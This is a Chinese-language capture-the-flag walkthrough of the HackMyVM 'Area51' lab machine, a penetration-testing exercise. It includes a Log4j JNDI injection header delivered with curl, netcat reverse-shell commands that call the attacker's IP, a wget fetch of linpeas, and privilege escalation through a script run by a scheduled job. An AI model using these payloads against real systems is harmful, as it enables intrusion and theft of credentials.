记一次对Hackmyvm-Area51靶机的渗透测试

简介: 记一次对Hackmyvm-Area51靶机的渗透测试

靶机信息

靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Area51

名称:Area51(51区)

难度:中等

创作者:bit

发布日期:2021-12-24

目标:user.txt和root.txt

搭建靶机

下载完Area51.ova后,使用Oracle VM VirtualBox导入即可

b552dfb3745fee5157322d1bbbbcb25e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

导入时注意!!不要勾上USB控制器,不然会出错

7c6d6f1cf7637abab1e7b614308b421a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

导入完成后,直接启动即可,就可以开始靶机之旅

实验环境

攻击机:VMwareKali192.168.2.148
目标机:VirtualBoxDebianIP自动获取

信息收集

扫描局域网内的靶机IP地址

nmap -sn 192.168.2.0/24

e1bc5ea36714af2b83090553abb50a6c_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

端口扫描,扫描目标机器所开放的服务

nmap -A -p- 192.168.2.108

eded8297a1f30b64c002a732ed062103_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

扫描到22(SSH)、80(HTTP)、8080(HTTP)三个端口,使用火狐浏览器访问80端口,192.168.2.108

好家伙佛波乐(FBI)页面,访问下8080端口,192.168.2.108:8080

5215226b7f32cd3936bd9ab82def66c0_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

发现是一个400报错页面

056fa61dc0ba67f8dc363cd153a7e226_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

目录扫描,扫描一些敏感文件之类的,使用gobuster来扫描

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.2.108/ -x php,html,txt

e38ca321c1e653934b42e1bcbfff5247_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

扫描到一个note.txt,访问下192.168.2.108/note.txt

ab6e8f092f4aaeb82f0e65181cc1ccbb_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

翻译看看

e74a6f3ba23a9864319c038a012a19ae_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

渗透测试

提示存在Log4j漏洞,猜测到很有可能跟8080端口有关,直接访问,使用Burp的插件log4j扫描看看

45e518c44e07f0be5f84fad4af59bc65_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

发现X-Api-Version:参数存在漏洞

存在log4j漏洞,使用poc(https://github.com/kozmer/log4j-shell-poc)拿shell

在kali机器中,log4j-shell-poc目录下必须有jdk1.8.0_20文件夹的java

(https://repo.huaweicloud.com/java/jdk/8u201-b09/jdk-8u201-linux-x64.tar.gz)

git clone https://github.com/kozmer/log4j-shell-poc.git
cd log4j-shell-poc
python3 poc.py --userip 192.168.2.148

f3417c4df8e32a66f7e65292bac705a7_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

新开一个终端页面开启监听

nc -nvlp 9001

再新开一个终端页面,输入刚刚的payload

curl 'http://192.168.2.108:8080' -H 'X-Api-Version: ${jndi:ldap://192.168.2.148:1389/a}'

监听这边的终端就收到了

377d770f89ba98c6a11a6e83337a83aa_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

发现是在docker里面,上传一个linpeas.sh搜集下信息

kali机器下载好linpeas.sh,新开一个终端页面开启远程下载服务

python3 -m http.server 7788

监听这边的终端页面执行下载linpeas.sh

wget http://192.168.2.148:7788/linpeas.sh

7668292b9610a085d337706c351bdf48_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

执行linpeas.sh信息收集

chmod +x linpeas.sh
./linpeas.sh

发现一些目录查看下

8f9bcb0028081690c76fce905db10539_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

cat /var/tmp/.roger,查询到roger的密码
使用ssh远程登录
ssh roger@192.168.2.108

0837831d7d28b966a2aa60b40e5bc9f4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

拿到user.txt下的一个FLAG=[xxxxxx]

继续使用linpeas.sh搜集信息

wget http://192.168.2.148:7788/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

20569dfb33aac0f68463490369e6a0c4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

发现了roger下有个kang

cat /etc/pam.d/kang,发现是kang的密码
su kang

94bfad8eec1dbda6827084a85369d237_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

发现kang的主目录发生了一些奇怪的事情,一个文件不断出现并消失

看起来像是kang用户创建了一个shell脚本,执行所有的.sh文件并删除它们

echo "echo test >/tmp/test" > test.sh
ls /tmp/test -l
echo "nc -e /bin/bash 192.168.2.148 4444" >test.sh

606ef09f5705cc6e34fd24e98b1f7748_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

新开一个终端页面开启监听

nc -nvlp 4444
python3 -c 'import pty;pty.spawn("/bin/bash")'
cd root
cat root.txt

eaecaca4312179be8800e3871757f006_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

成功获取到root权限下的FLAG=[xxxxx]

相关文章
|
1月前
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
31 4
|
1月前
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
37 4
|
1月前
|
Devops Shell 网络安全
Neos的渗透测试靶机练习——Wakanda
Neos的渗透测试靶机练习——Wakanda
21 2
|
2月前
|
安全 中间件 Shell
渗透测试-靶机DC-2-知识点总结
渗透测试-靶机DC-2-知识点总结
36 0
|
2月前
|
安全 网络协议 Shell
渗透测试-靶机DC-1-知识点总结
渗透测试-靶机DC-1-知识点总结
41 0
|
安全 Shell 网络安全
看完这篇 教你玩转渗透测试靶机Vulnhub——Grotesque:3.0.1
看完这篇 教你玩转渗透测试靶机Vulnhub——Grotesque:3.0.1
206 1
|
SQL 安全 Shell
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
327 0
|
安全 Oracle Shell
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
看完这篇 教你玩转渗透测试靶机Vulnhub——Hacksudo: Aliens
229 0
|
安全 Oracle 关系型数据库
看完这篇 教你玩转渗透测试靶机Vulnhub——Bluemoon: 2021
看完这篇 教你玩转渗透测试靶机Vulnhub——Bluemoon: 2021
612 0
|
安全 Oracle 机器人
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
157 0